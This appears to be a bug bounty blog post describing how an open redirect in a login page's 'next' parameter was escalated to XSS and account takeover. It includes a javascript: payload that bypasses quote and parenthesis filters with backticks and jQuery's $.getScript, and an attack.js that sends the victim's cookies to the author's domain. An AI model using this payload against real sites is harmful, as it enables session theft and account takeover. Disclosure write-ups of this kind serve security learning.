Open-redirect to Account Takeover.

Rishabh
Rishabh
May 19, 2019 · 2 min read
Image for post
Image for post
We will lead to here later.

Hi everyone this is my first writeup about my first bug and I want to share how I escalated open redirect to Account Takeover. Let’s go

https://victim.com/login/?next=/page/

This was the URL which redirects to the given page after login but the issue was that if I pass https://google.com to next parameter it will redirect to google.com which is external.

After reading more than 15 reports about the open redirect, I came to know what you can do with this vulnerability is redirect the user to your domain and then prompt for sensitive information for which the manipulated URL will look something like this

https://victim.com/login/?next=https://your_domain.com

But I did not report it that way instead I thought why not to try something else like different scheme (javascript:) and luckily there were no filters for that so now the vulnerability escalated from phishing attack to XSS after that I just made a nice POC stealing cookies of the current user who opens the manipulated URL.

Problems I faced during making POC.

  1. Double quotes, single quote, and Parentheses were not allowed.[I used the backtick(`)]
  2. For stealing cookies you need to make a request to your server with cookies but we can’t use fetch or XMLHttpRequest because both require Parentheses.[After one day of searching I came to know that the website uses jquery so I added my own javascript to their domain which basically allowed me to do anything] —

?next= javascript:$.getScript`https://my_own_domain/attack.js`

Attack.js

if(location.host == “my_own_domain”){ 
Url = new URL(document.location);
Parameters = new URLSearchParams(x.search);
cookie = Parameters.get(“cookie”);
document.write(cookie);
}
else{
var cookie = document.cookie;
document.location=“https://my_own_domain/attacker.html?cookie="+cookie;
}

TakeAways

  1. Always try the different thing I even tried for XSS (?next=<script>alert(1)</script>) sometimes it works out sometimes it does not but in both cases, you gain the experience and familiarity to the concept.
  2. It may take you time to find your first bug but the experience is worth it.

Final Payload

https://victim.com/?next= javascript:$.getScript`https://my_own_domain/attack.js`

My twitter ==> ME

Thanks a lot for reading. Until next time

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch

Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore

Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store